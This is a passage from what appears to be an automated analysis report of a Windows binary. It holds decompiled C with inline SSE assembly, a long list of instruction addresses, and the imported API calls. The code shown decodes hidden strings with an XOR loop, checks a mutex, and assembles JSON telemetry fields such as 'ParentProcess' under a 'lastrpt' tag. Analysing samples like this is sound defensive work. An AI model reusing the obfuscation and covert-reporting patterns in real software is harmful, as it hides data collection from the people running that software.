                                                                                        								asm("pand xmm1, [0x190d10]");
                                                                                        								asm("packuswb xmm1, xmm1");
                                                                                        								asm("movd xmm0, eax");
                                                                                        								asm("paddb xmm1, xmm0");
                                                                                        								asm("movd xmm0, dword [ebp-0x64]");
                                                                                        								asm("pxor xmm1, xmm0");
                                                                                        								asm("movd [ebp-0x64], xmm1");
                                                                                        							}
                                                                                        							do {
                                                                                        								_t405 = (0xa0a0a0a1 * _t352 >> 0x20) + _t352 >> 5;
                                                                                        								_t356 = _v244;
                                                                                        								 *(_t425 + _t356 - 0x68) =  *(_t425 + _t356 - 0x68) ^ 0x33 + _t356;
                                                                                        								_t352 = _t356 + 1;
                                                                                        								_v244 = _t352;
                                                                                        								__eflags = _t352 - 0xd;
                                                                                        							} while (_t352 < 0xd);
                                                                                        							_t416 = E0016B6C0( &_v248,  &_v108);
                                                                                        							__eflags = _t416;
                                                                                        							if(_t416 == 0) {
                                                                                        								L53:
                                                                                        								E0016B610( &_v248);
                                                                                        								goto L54;
                                                                                        							}
                                                                                        							_push(0);
                                                                                        							L00176836();
                                                                                        							_push(1);
                                                                                        							_v8 = 6;
                                                                                        							L00176848();
                                                                                        							_v8 = 7;
                                                                                        							_push( &_v140);
                                                                                        							_push("bCheckNav");
                                                                                        							L00176866();
                                                                                        							L0017685A();
                                                                                        							_v8 = 6;
                                                                                        							L00176854();
                                                                                        							_push( *0x19dbc4);
                                                                                        							L0017683C();
                                                                                        							_v8 = 8;
                                                                                        							_push( &_v140);
                                                                                        							_push("bFirstCity");
                                                                                        							L00176866();
                                                                                        							L0017685A();
                                                                                        							_v8 = 6;
                                                                                        							L00176854();
                                                                                        							_t265 =  *0x190730; // 0x46581242
                                                                                        							asm("movq xmm0, [0x190728]");
                                                                                        							_v124 = _t265;
                                                                                        							_t266 =  *0x190734; // 0x405a
                                                                                        							asm("movq [ebp-0x80], xmm0");
                                                                                        							_v120 = _t266;
                                                                                        							__eflags = _t266;
                                                                                        							if(_t266 == 0) {
                                                                                        								L47:
                                                                                        								L00176842();
                                                                                        								_v8 = 9;
                                                                                        								L00176866();
                                                                                        								L0017685A();
                                                                                        								_v8 = 6;
                                                                                        								L00176854();
                                                                                        								L0017684E();
                                                                                        								_v8 = 0xa;
                                                                                        								L0017687E();
                                                                                        								_v8 = 0xb;
                                                                                        								L00176884();
                                                                                        								E0016CAB0(_t321,  &_v240,  &_v44);
                                                                                        								L00176854();
                                                                                        								_t434 = _t432 - 0x18;
                                                                                        								_v8 = 0xc;
                                                                                        								E001622D0(_t434,  &_v44);
                                                                                        								 *_t416();
                                                                                        								_t435 = _t434 - 0x18;
                                                                                        								_t378 = _t435;
                                                                                        								 *(_t378 + 0x10) = 0;
                                                                                        								 *((intOrPtr*)(_t378 + 0x14)) = 7;
                                                                                        								 *_t378 = 0;
                                                                                        								E00163540(_t321, _t405, _t416, L"lastrpt");
                                                                                        								E00173950(_t321, _t405, _t416, __eflags, 7,  &_v288,  &_v84, "ParentProcess",  &_v288,  &_v132);
                                                                                        								_t406 = _v24;
                                                                                        								_t432 = _t435 + 0x18;
                                                                                        								_v8 = 6;
                                                                                        								__eflags = _t406 - 0x10;
                                                                                        								if(_t406 >= 0x10) {
                                                                                        									_t380 = _v44;
                                                                                        									_t407 = _t406 + 1;
                                                                                        									_t279 = _t380;
                                                                                        									__eflags = _t407 - 0x1000;
                                                                                        									if(_t407 >= 0x1000) {
                                                                                        										_t380 =  *((intOrPtr*)(_t380 - 4));
                                                                                        										_t407 = _t407 + 0x23;
                                                                                        										_t279 = _t279 - _t380 + 0xfffffffc;
                                                                                        										__eflags = _t279 - 0x1f;
                                                                                        										if(_t279 > 0x1f) {
                                                                                        											__imp___invalid_parameter_noinfo_noreturn();
                                                                                        										}
                                                                                        									}
                                                                                        									_push(_t407);
                                                                                        									E00175733(_t279, _t380);
                                                                                        									_t432 = _t432 + 8;
                                                                                        								}
                                                                                        								_v28 = 0;
                                                                                        								_v24 = 0xf;
                                                                                        								_v44 = 0;
                                                                                        								_v8 = 5;
                                                                                        								L00176854();
                                                                                        								goto L53;
                                                                                        							}
                                                                                        							_t381 = 0;
                                                                                        							_v244 = 0;
                                                                                        							__eflags = _t421 - 2;
                                                                                        							if(_t421 >= 2) {
                                                                                        								asm("movaps xmm2, [0x18ffd0]");
                                                                                        								asm("movaps xmm5, [0x190d30]");
                                                                                        								asm("movaps xmm1, xmm2");
                                                                                        								asm("punpckldq xmm1, xmm2");
                                                                                        								asm("movaps xmm0, xmm2");
                                                                                        								asm("punpckhdq xmm0, xmm2");
                                                                                        								_t381 = 8;
                                                                                        								asm("pmuldq xmm0, xmm5");
                                                                                        								asm("pmuldq xmm1, xmm5");
                                                                                        								asm("shufps xmm1, xmm0, 0xdd");
                                                                                        								asm("paddd xmm1, xmm2");
                                                                                        								asm("movd xmm6, eax");
                                                                                        								asm("psrad xmm1, xmm6");
                                                                                        								_v244 = 8;
                                                                                        								asm("movaps xmm0, xmm1");
                                                                                        								asm("movd xmm7, eax");
                                                                                        								asm("psrld xmm0, xmm7");
                                                                                        								asm("paddd xmm0, xmm1");
                                                                                        								asm("pmulld xmm0, [0x190d00]");
                                                                                        								asm("psubd xmm2, xmm0");
                                                                                        								asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        								asm("movaps xmm2, [0x18ffe0]");
                                                                                        								asm("paddd xmm2, [0x18ffd0]");
                                                                                        								asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        								asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        								asm("pand xmm1, [0x190d10]");
                                                                                        								asm("packuswb xmm1, xmm1");
                                                                                        								asm("movd xmm0, eax");
                                                                                        								asm("paddb xmm1, xmm0");
                                                                                        								asm("movd xmm0, dword [0x190728]");
                                                                                        								asm("pxor xmm1, xmm0");
                                                                                        								asm("movaps xmm0, xmm2");
                                                                                        								asm("movd [ebp-0x80], xmm1");
                                                                                        								asm("movaps xmm1, xmm2");
                                                                                        								asm("punpckldq xmm1, xmm2");
                                                                                        								asm("punpckhdq xmm0, xmm2");
                                                                                        								asm("pmuldq xmm0, xmm5");
                                                                                        								asm("pmuldq xmm1, xmm5");
                                                                                        								asm("shufps xmm1, xmm0, 0xdd");
                                                                                        								asm("paddd xmm1, xmm2");
                                                                                        								asm("psrad xmm1, xmm6");
                                                                                        								asm("movaps xmm0, xmm1");
                                                                                        								asm("psrld xmm0, xmm7");
                                                                                        								asm("paddd xmm0, xmm1");
                                                                                        								asm("pmulld xmm0, [0x190d00]");
                                                                                        								asm("psubd xmm2, xmm0");
                                                                                        								asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        								asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        								asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        								asm("pand xmm1, [0x190d10]");
                                                                                        								asm("packuswb xmm1, xmm1");
                                                                                        								asm("movd xmm0, eax");
                                                                                        								asm("paddb xmm1, xmm0");
                                                                                        								asm("movd xmm0, dword [ebp-0x7c]");
                                                                                        								asm("pxor xmm1, xmm0");
                                                                                        								asm("movd [ebp-0x7c], xmm1");
                                                                                        								asm("o16 nop [eax+eax]");
                                                                                        							}
                                                                                        							do {
                                                                                        								_t405 = (0xa0a0a0a1 * _t381 >> 0x20) + _t381 >> 5;
                                                                                        								_t385 = _v244;
                                                                                        								 *(_t425 + _t385 - 0x80) =  *(_t425 + _t385 - 0x80) ^ 0x33 + _t385;
                                                                                        								_t381 = _t385 + 1;
                                                                                        								_v244 = _t381;
                                                                                        								__eflags = _t381 - 0xe;
                                                                                        							} while (_t381 < 0xe);
                                                                                        							goto L47;
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_v120);
                                                                                        					_v104 = 0;
                                                                                        					_v100 = 0;
                                                                                        					_v96 = 0;
                                                                                        					E0016C360( &_v104, __eflags, _t420, _t420 + _v244); // executed
                                                                                        					_v8 = 4;
                                                                                        					E00164BB0( &_v124,  &_v104,  &_v260); // executed
                                                                                        					_t388 = _v104;
                                                                                        					_v8 = 3;
                                                                                        					__eflags = _t388;
                                                                                        					if(_t388 == 0) {
                                                                                        						goto L32;
                                                                                        					}
                                                                                        					_t301 = _t388;
                                                                                        					_t411 = _v96 - _t388;
                                                                                        					__eflags = _t411 - 0x1000;
                                                                                        					if(_t411 >= 0x1000) {
                                                                                        						_t388 =  *(_t388 - 4);
                                                                                        						_t411 = _t411 + 0x23;
                                                                                        						_t301 = _t301 - _t388 + 0xfffffffc;
                                                                                        						__eflags = _t301 - 0x1f;
                                                                                        						if(_t301 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t411);
                                                                                        					E00175733(_t301, _t388); // executed
                                                                                        					_t431 = _t431 + 8;
                                                                                        					goto L32;
                                                                                        				}
                                                                                        				_t439 =  *0x19dbc8 - _t201; // 0x1
                                                                                        				if(_t439 == 0) {
                                                                                        					goto L64;
                                                                                        				}
                                                                                        				goto L3;
                                                                                        			}










































































































                                                                                        0x0016e9a0
                                                                                        0x0016e9a0
                                                                                        0x0016e9a0
                                                                                        0x0016e9a3
                                                                                        0x0016e9b7
                                                                                        0x0016e9be
                                                                                        0x0016e9c7
                                                                                        0x0016e9d5
                                                                                        0x0016e9d8
                                                                                        0x0016e9dc
                                                                                        0x0016e9e3
                                                                                        0x0016e9ef
                                                                                        0x0016e9f2
                                                                                        0x0016e9f7
                                                                                        0x0016e9fc
                                                                                        0x0016ea01
                                                                                        0x0016f4e1
                                                                                        0x0016f4e6
                                                                                        0x0016f4f3
                                                                                        0x0016f4fd
                                                                                        0x0016f4fd
                                                                                        0x0016ea07
                                                                                        0x0016ea0d
                                                                                        0x0016ea1b
                                                                                        0x0016ea1b
                                                                                        0x0016ea21
                                                                                        0x0016ea27
                                                                                        0x0016ea2a
                                                                                        0x0016ea67
                                                                                        0x0016ea84
                                                                                        0x0016ea87
                                                                                        0x0016ea8d
                                                                                        0x0016ea90
                                                                                        0x0016ea93
                                                                                        0x0016ea99
                                                                                        0x0016eac4
                                                                                        0x0016eac6
                                                                                        0x0016ead5
                                                                                        0x0016ead5
                                                                                        0x0016eac8
                                                                                        0x0016eac8
                                                                                        0x0016eac9
                                                                                        0x0016eace
                                                                                        0x0016ead1
                                                                                        0x0016ead1
                                                                                        0x0016ead7
                                                                                        0x0016eade
                                                                                        0x0016eae9
                                                                                        0x0016eaf4
                                                                                        0x0016eaf7
                                                                                        0x0016eafa
                                                                                        0x0016eb00
                                                                                        0x0016eb03
                                                                                        0x0016eb07
                                                                                        0x00000000
                                                                                        0x0016eb07
                                                                                        0x0016ea9b
                                                                                        0x0016ea9e
                                                                                        0x0016eaa5
                                                                                        0x0016eaa8
                                                                                        0x0016eaa9
                                                                                        0x0016eaae
                                                                                        0x0016eab1
                                                                                        0x0016eab3
                                                                                        0x00000000
                                                                                        0x0016eab9
                                                                                        0x0016eab9
                                                                                        0x0016eabc
                                                                                        0x0016eabf
                                                                                        0x00000000
                                                                                        0x0016eabf
                                                                                        0x0016ea69
                                                                                        0x0016ea69
                                                                                        0x0016ea6c
                                                                                        0x0016ea6f
                                                                                        0x0016ea72
                                                                                        0x0016ea79
                                                                                        0x0016eb0a
                                                                                        0x0016eb0b
                                                                                        0x0016eb11
                                                                                        0x0016eb14
                                                                                        0x0016eb1d
                                                                                        0x0016eb54
                                                                                        0x0016eb57
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016eb5d
                                                                                        0x0016eb60
                                                                                        0x0016eb61
                                                                                        0x0016eb63
                                                                                        0x0016eb69
                                                                                        0x0016f4d7
                                                                                        0x0016f4d7
                                                                                        0x0016f4d9
                                                                                        0x00000000
                                                                                        0x0016f4de
                                                                                        0x0016eb6f
                                                                                        0x0016eb72
                                                                                        0x0016eb77
                                                                                        0x0016eb7a
                                                                                        0x0016eb7d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016eb83
                                                                                        0x0016eb83
                                                                                        0x00000000
                                                                                        0x0016eb83
                                                                                        0x0016eb22
                                                                                        0x0016eb4c
                                                                                        0x0016eb4c
                                                                                        0x00000000
                                                                                        0x0016eb4c
                                                                                        0x0016eb24
                                                                                        0x0016eb27
                                                                                        0x0016eb28
                                                                                        0x0016eb30
                                                                                        0x0016eb42
                                                                                        0x0016eb42
                                                                                        0x0016eb44
                                                                                        0x0016eb49
                                                                                        0x00000000
                                                                                        0x0016eb49
                                                                                        0x0016eb32
                                                                                        0x0016eb35
                                                                                        0x0016eb40
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016eb40
                                                                                        0x0016ea67
                                                                                        0x0016eb89
                                                                                        0x0016eb93
                                                                                        0x0016eb9e
                                                                                        0x0016eb9f
                                                                                        0x0016eba4
                                                                                        0x0016ebab
                                                                                        0x0016ebb5
                                                                                        0x0016ebbf
                                                                                        0x0016ebc9
                                                                                        0x0016ebcf
                                                                                        0x0016ebd6
                                                                                        0x0016ebd7
                                                                                        0x0016ebdb
                                                                                        0x0016ebe6
                                                                                        0x0016ebed
                                                                                        0x0016ebf2
                                                                                        0x0016ec05
                                                                                        0x0016ec0e
                                                                                        0x0016ec13
                                                                                        0x0016ec22
                                                                                        0x0016ec27
                                                                                        0x0016ec2e
                                                                                        0x0016ec39
                                                                                        0x0016ec3c
                                                                                        0x0016ec41
                                                                                        0x0016ec45
                                                                                        0x0016ec4b
                                                                                        0x0016ec53
                                                                                        0x0016ec57
                                                                                        0x0016ec5b
                                                                                        0x0016ec62
                                                                                        0x0016ec66
                                                                                        0x0016ec6d
                                                                                        0x0016ec71
                                                                                        0x0016ec87
                                                                                        0x0016ec9a
                                                                                        0x0016eca2
                                                                                        0x0016ecaa
                                                                                        0x0016ecb3
                                                                                        0x0016ecb5
                                                                                        0x0016ed32
                                                                                        0x0016ed32
                                                                                        0x0016ed33
                                                                                        0x0016ed38
                                                                                        0x0016ed3e
                                                                                        0x0016ed49
                                                                                        0x0016ed4d
                                                                                        0x0016ed52
                                                                                        0x0016ed57
                                                                                        0x0016ed59
                                                                                        0x0016ed61
                                                                                        0x0016ed67
                                                                                        0x0016ed6a
                                                                                        0x0016ed72
                                                                                        0x0016ed78
                                                                                        0x0016ed7d
                                                                                        0x0016ed83
                                                                                        0x0016ed86
                                                                                        0x0016ed8c
                                                                                        0x0016ed93
                                                                                        0x0016ed98
                                                                                        0x0016ed9f
                                                                                        0x0016eda2
                                                                                        0x0016eda6
                                                                                        0x0016eda9
                                                                                        0x0016edad
                                                                                        0x0016edb2
                                                                                        0x0016edb7
                                                                                        0x0016edbb
                                                                                        0x0016edbf
                                                                                        0x0016edc3
                                                                                        0x0016edc7
                                                                                        0x0016edcb
                                                                                        0x0016edce
                                                                                        0x0016edd4
                                                                                        0x0016edd8
                                                                                        0x0016eddc
                                                                                        0x0016ede5
                                                                                        0x0016ede9
                                                                                        0x0016edee
                                                                                        0x0016edf5
                                                                                        0x0016edfd
                                                                                        0x0016ee02
                                                                                        0x0016ee07
                                                                                        0x0016ee0f
                                                                                        0x0016ee17
                                                                                        0x0016ee1b
                                                                                        0x0016ee23
                                                                                        0x0016ee27
                                                                                        0x0016ee2a
                                                                                        0x0016ee2f
                                                                                        0x0016ee32
                                                                                        0x0016ee36
                                                                                        0x0016ee3a
                                                                                        0x0016ee3f
                                                                                        0x0016ee44
                                                                                        0x0016ee48
                                                                                        0x0016ee4c
                                                                                        0x0016ee50
                                                                                        0x0016ee53
                                                                                        0x0016ee57
                                                                                        0x0016ee5b
                                                                                        0x0016ee64
                                                                                        0x0016ee68
                                                                                        0x0016ee6d
                                                                                        0x0016ee72
                                                                                        0x0016ee77
                                                                                        0x0016ee7f
                                                                                        0x0016ee84
                                                                                        0x0016ee88
                                                                                        0x0016ee90
                                                                                        0x0016ee94
                                                                                        0x0016ee94
                                                                                        0x0016eea0
                                                                                        0x0016eeb7
                                                                                        0x0016eec5
                                                                                        0x0016eec9
                                                                                        0x0016eeca
                                                                                        0x0016eed0
                                                                                        0x0016eed0
                                                                                        0x0016eee0
                                                                                        0x0016eee6
                                                                                        0x0016eee8
                                                                                        0x0016eef3
                                                                                        0x0016eef3
                                                                                        0x0016eefe
                                                                                        0x0016eeea
                                                                                        0x0016eeeb
                                                                                        0x0016eeeb
                                                                                        0x0016ef0a
                                                                                        0x0016ef25
                                                                                        0x0016ef29
                                                                                        0x0016ef2e
                                                                                        0x0016ef30
                                                                                        0x0016f413
                                                                                        0x0016f41f
                                                                                        0x0016f426
                                                                                        0x0016f432
                                                                                        0x0016f439
                                                                                        0x0016f443
                                                                                        0x0016f446
                                                                                        0x0016f44b
                                                                                        0x0016f451
                                                                                        0x0016f453
                                                                                        0x0016f45b
                                                                                        0x0016f45d
                                                                                        0x0016f45f
                                                                                        0x0016f465
                                                                                        0x0016f467
                                                                                        0x0016f46a
                                                                                        0x0016f46f
                                                                                        0x0016f472
                                                                                        0x0016f475
                                                                                        0x0016f477
                                                                                        0x0016f477
                                                                                        0x0016f475
                                                                                        0x0016f47d
                                                                                        0x0016f47f
                                                                                        0x0016f484
                                                                                        0x0016f487
                                                                                        0x0016f491
                                                                                        0x0016f49b
                                                                                        0x0016f49b
                                                                                        0x0016f4a5
                                                                                        0x0016f4ab
                                                                                        0x0016f4ae
                                                                                        0x00000000
                                                                                        0x0016f4b0
                                                                                        0x0016f4b0
                                                                                        0x0016f4b6
                                                                                        0x0016f4b7
                                                                                        0x0016f4b9
                                                                                        0x0016f4bf
                                                                                        0x0016f4c1
                                                                                        0x0016f4c4
                                                                                        0x0016f4c9
                                                                                        0x0016f4cc
                                                                                        0x0016f4cf
                                                                                        0x0016f4d1
                                                                                        0x0016f4d1
                                                                                        0x0016f4cf
                                                                                        0x00000000
                                                                                        0x0016f4bf
                                                                                        0x0016ef36
                                                                                        0x0016ef36
                                                                                        0x0016ef3b
                                                                                        0x0016ef3d
                                                                                        0x0016ef45
                                                                                        0x0016ef48
                                                                                        0x0016ef4d
                                                                                        0x0016ef52
                                                                                        0x0016ef55
                                                                                        0x0016ef5b
                                                                                        0x0016ef5e
                                                                                        0x0016ef64
                                                                                        0x0016ef70
                                                                                        0x0016ef77
                                                                                        0x0016ef7a
                                                                                        0x0016ef7e
                                                                                        0x0016ef81
                                                                                        0x0016ef85
                                                                                        0x0016ef8a
                                                                                        0x0016ef8f
                                                                                        0x0016ef94
                                                                                        0x0016ef98
                                                                                        0x0016ef9c
                                                                                        0x0016efa0
                                                                                        0x0016efa4
                                                                                        0x0016efad
                                                                                        0x0016efb0
                                                                                        0x0016efb4
                                                                                        0x0016efba
                                                                                        0x0016efbe
                                                                                        0x0016efc7
                                                                                        0x0016efcb
                                                                                        0x0016efd0
                                                                                        0x0016efd7
                                                                                        0x0016efdf
                                                                                        0x0016efe4
                                                                                        0x0016efe9
                                                                                        0x0016eff1
                                                                                        0x0016eff5
                                                                                        0x0016eff9
                                                                                        0x0016effd
                                                                                        0x0016f005
                                                                                        0x0016f009
                                                                                        0x0016f00c
                                                                                        0x0016f011
                                                                                        0x0016f014
                                                                                        0x0016f018
                                                                                        0x0016f01c
                                                                                        0x0016f021
                                                                                        0x0016f026
                                                                                        0x0016f02a
                                                                                        0x0016f02e
                                                                                        0x0016f032
                                                                                        0x0016f035
                                                                                        0x0016f039
                                                                                        0x0016f03d
                                                                                        0x0016f046
                                                                                        0x0016f04a
                                                                                        0x0016f04f
                                                                                        0x0016f054
                                                                                        0x0016f059
                                                                                        0x0016f061
                                                                                        0x0016f065
                                                                                        0x0016f069
                                                                                        0x0016f06d
                                                                                        0x0016f072
                                                                                        0x0016f076
                                                                                        0x0016f076
                                                                                        0x0016f080
                                                                                        0x0016f08b
                                                                                        0x0016f097
                                                                                        0x0016f0a5
                                                                                        0x0016f0a9
                                                                                        0x0016f0aa
                                                                                        0x0016f0b0
                                                                                        0x0016f0b0
                                                                                        0x0016f0c4
                                                                                        0x0016f0c6
                                                                                        0x0016f0c8
                                                                                        0x0016f408
                                                                                        0x0016f40e
                                                                                        0x00000000
                                                                                        0x0016f40e
                                                                                        0x0016f0ce
                                                                                        0x0016f0d3
                                                                                        0x0016f0d8
                                                                                        0x0016f0e0
                                                                                        0x0016f0e4
                                                                                        0x0016f0ef
                                                                                        0x0016f0f3
                                                                                        0x0016f0f4
                                                                                        0x0016f0fc
                                                                                        0x0016f103
                                                                                        0x0016f10e
                                                                                        0x0016f112
                                                                                        0x0016f117
                                                                                        0x0016f123
                                                                                        0x0016f12e
                                                                                        0x0016f132
                                                                                        0x0016f133
                                                                                        0x0016f13b
                                                                                        0x0016f142
                                                                                        0x0016f14d
                                                                                        0x0016f151
                                                                                        0x0016f156
                                                                                        0x0016f15b
                                                                                        0x0016f163
                                                                                        0x0016f166
                                                                                        0x0016f16c
                                                                                        0x0016f171
                                                                                        0x0016f175
                                                                                        0x0016f177
                                                                                        0x0016f2e5
                                                                                        0x0016f2ef
                                                                                        0x0016f2fa
                                                                                        0x0016f307
                                                                                        0x0016f30e
                                                                                        0x0016f319
                                                                                        0x0016f31d
                                                                                        0x0016f32c
                                                                                        0x0016f337
                                                                                        0x0016f33b
                                                                                        0x0016f346
                                                                                        0x0016f355
                                                                                        0x0016f360
                                                                                        0x0016f36b
                                                                                        0x0016f370
                                                                                        0x0016f373
                                                                                        0x0016f37d
                                                                                        0x0016f382
                                                                                        0x0016f384
                                                                                        0x0016f389
                                                                                        0x0016f38d
                                                                                        0x0016f394
                                                                                        0x0016f3a0
                                                                                        0x0016f3a3
                                                                                        0x0016f3a8
                                                                                        0x0016f3ad
                                                                                        0x0016f3b0
                                                                                        0x0016f3b3
                                                                                        0x0016f3b7
                                                                                        0x0016f3ba
                                                                                        0x0016f3bc
                                                                                        0x0016f3bf
                                                                                        0x0016f3c0
                                                                                        0x0016f3c2
                                                                                        0x0016f3c8
                                                                                        0x0016f3ca
                                                                                        0x0016f3cd
                                                                                        0x0016f3d2
                                                                                        0x0016f3d5
                                                                                        0x0016f3d8
                                                                                        0x0016f3da
                                                                                        0x0016f3da
                                                                                        0x0016f3d8
                                                                                        0x0016f3e0
                                                                                        0x0016f3e2
                                                                                        0x0016f3e7
                                                                                        0x0016f3e7
                                                                                        0x0016f3ed
                                                                                        0x0016f3f4
                                                                                        0x0016f3fb
                                                                                        0x0016f3ff
                                                                                        0x0016f403
                                                                                        0x00000000
                                                                                        0x0016f403
                                                                                        0x0016f17d
                                                                                        0x0016f17f
                                                                                        0x0016f185
                                                                                        0x0016f188
                                                                                        0x0016f18e
                                                                                        0x0016f19a
                                                                                        0x0016f1a1
                                                                                        0x0016f1a4
                                                                                        0x0016f1a8
                                                                                        0x0016f1ab
                                                                                        0x0016f1af
                                                                                        0x0016f1b4
                                                                                        0x0016f1b9
                                                                                        0x0016f1be
                                                                                        0x0016f1c2
                                                                                        0x0016f1c6
                                                                                        0x0016f1ca
                                                                                        0x0016f1d3
                                                                                        0x0016f1d9
                                                                                        0x0016f1dc
                                                                                        0x0016f1e5
                                                                                        0x0016f1e9
                                                                                        0x0016f1ed
                                                                                        0x0016f1f6
                                                                                        0x0016f1fa
                                                                                        0x0016f1ff
                                                                                        0x0016f206
                                                                                        0x0016f20e
                                                                                        0x0016f213
                                                                                        0x0016f218
                                                                                        0x0016f220
                                                                                        0x0016f224
                                                                                        0x0016f228
                                                                                        0x0016f22c
                                                                                        0x0016f234
                                                                                        0x0016f238
                                                                                        0x0016f23b
                                                                                        0x0016f240
                                                                                        0x0016f243
                                                                                        0x0016f247
                                                                                        0x0016f24b
                                                                                        0x0016f250
                                                                                        0x0016f255
                                                                                        0x0016f259
                                                                                        0x0016f25d
                                                                                        0x0016f261
                                                                                        0x0016f264
                                                                                        0x0016f268
                                                                                        0x0016f26c
                                                                                        0x0016f275
                                                                                        0x0016f279
                                                                                        0x0016f27e
                                                                                        0x0016f283
                                                                                        0x0016f288
                                                                                        0x0016f290
                                                                                        0x0016f294
                                                                                        0x0016f298
                                                                                        0x0016f29c
                                                                                        0x0016f2a1
                                                                                        0x0016f2a5
                                                                                        0x0016f2aa
                                                                                        0x0016f2aa
                                                                                        0x0016f2b0
                                                                                        0x0016f2bb
                                                                                        0x0016f2c7
                                                                                        0x0016f2d5
                                                                                        0x0016f2d9
                                                                                        0x0016f2da
                                                                                        0x0016f2e0
                                                                                        0x0016f2e0
                                                                                        0x00000000
                                                                                        0x0016f2b0
                                                                                        0x0016ef30
                                                                                        0x0016ecc0
                                                                                        0x0016ecc5
                                                                                        0x0016ecce
                                                                                        0x0016ecd5
                                                                                        0x0016ecdc
                                                                                        0x0016ece7
                                                                                        0x0016ecf3
                                                                                        0x0016ecf8
                                                                                        0x0016ecfb
                                                                                        0x0016ecff
                                                                                        0x0016ed01
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016ed06
                                                                                        0x0016ed08
                                                                                        0x0016ed0a
                                                                                        0x0016ed10
                                                                                        0x0016ed12
                                                                                        0x0016ed15
                                                                                        0x0016ed1a
                                                                                        0x0016ed1d
                                                                                        0x0016ed20
                                                                                        0x0016ed22
                                                                                        0x0016ed22
                                                                                        0x0016ed20
                                                                                        0x0016ed28
                                                                                        0x0016ed2a
                                                                                        0x0016ed2f
                                                                                        0x00000000
                                                                                        0x0016ed2f
                                                                                        0x0016ea0f
                                                                                        0x0016ea15
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        APIs
                                                                                          • Part of subcall function 00163540: memmove.VCRUNTIME140(?,2C80D730,?,?,?,?,?,?,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731), ref: 0016356B
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,?,?,?,?,2C80D730), ref: 0016EAE9
                                                                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,2C80D730), ref: 0016EB0B
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,2C80D730), ref: 0016EB83
                                                                                        • memset.VCRUNTIME140(00000000,00000000,?,?,?,0019D028), ref: 0016EBED
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000,?,?,?,0019D028), ref: 0016EC0E
                                                                                          • Part of subcall function 00175703: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(2C80D730,?,00163245,2C80D730,?,string too long,0016353C,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731,00000000), ref: 00175718
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0016ED22
                                                                                        • OpenMutexA.KERNEL32 ref: 0016EEE0
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0016EEEB
                                                                                        • Sleep.KERNEL32(00000000), ref: 0016EEFE
                                                                                        • ??0Value@Json@@QAE@W4ValueType@1@@Z.JSONCPP(00000000), ref: 0016F0D3
                                                                                        • ??0Value@Json@@QAE@_N@Z.JSONCPP(00000001,00000000), ref: 0016F0E4
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(bCheckNav,?,00000001,00000000), ref: 0016F0FC
                                                                                        • ??4Value@Json@@QAEAAV01@$$QAV01@@Z.JSONCPP(bCheckNav,?,00000001,00000000), ref: 0016F103
                                                                                        • ??1Value@Json@@QAE@XZ.JSONCPP(bCheckNav,?,00000001,00000000), ref: 0016F112
                                                                                        • ??0Value@Json@@QAE@H@Z.JSONCPP(bCheckNav,?,00000001,00000000), ref: 0016F123
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(bFirstCity,?,bCheckNav,?,00000001,00000000), ref: 0016F13B
                                                                                        • ??4Value@Json@@QAEAAV01@$$QAV01@@Z.JSONCPP(bFirstCity,?,bCheckNav,?,00000001,00000000), ref: 0016F142
                                                                                        • ??1Value@Json@@QAE@XZ.JSONCPP(bFirstCity,?,bCheckNav,?,00000001,00000000), ref: 0016F151
                                                                                        • ??0Value@Json@@QAE@PBD@Z.JSONCPP(?,bFirstCity,?,bCheckNav,?,00000001,00000000), ref: 0016F2EF
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(ParentProcess,?,?,bFirstCity,?,bCheckNav,?,00000001,00000000), ref: 0016F307
                                                                                        • ??4Value@Json@@QAEAAV01@$$QAV01@@Z.JSONCPP(ParentProcess,?,?,bFirstCity,?,bCheckNav,?,00000001,00000000), ref: 0016F30E
                                                                                        • ??1Value@Json@@QAE@XZ.JSONCPP(ParentProcess,?,?,bFirstCity,?,bCheckNav,?,00000001,00000000), ref: 0016F31D
                                                                                        • ??0Value@Json@@QAE@ABV01@@Z.JSONCPP(?,ParentProcess,?,?,bFirstCity,?,bCheckNav,?,00000001,00000000), ref: 0016F32C
                                                                                        • ??0StyledWriter@Json@@QAE@XZ.JSONCPP(?,ParentProcess,?,?,bFirstCity,?,bCheckNav,?,00000001,00000000), ref: 0016F33B
                                                                                        • ?write@StyledWriter@Json@@UAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVValue@2@@Z.JSONCPP(?,?,?,ParentProcess,?,?,bFirstCity,?,bCheckNav,?,00000001,00000000), ref: 0016F355
                                                                                        • ??1Value@Json@@QAE@XZ.JSONCPP(?,?,?,ParentProcess,?,?,bFirstCity,?,bCheckNav,?,00000001,00000000), ref: 0016F36B
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0016F3DA
                                                                                        • ??1Value@Json@@QAE@XZ.JSONCPP ref: 0016F403
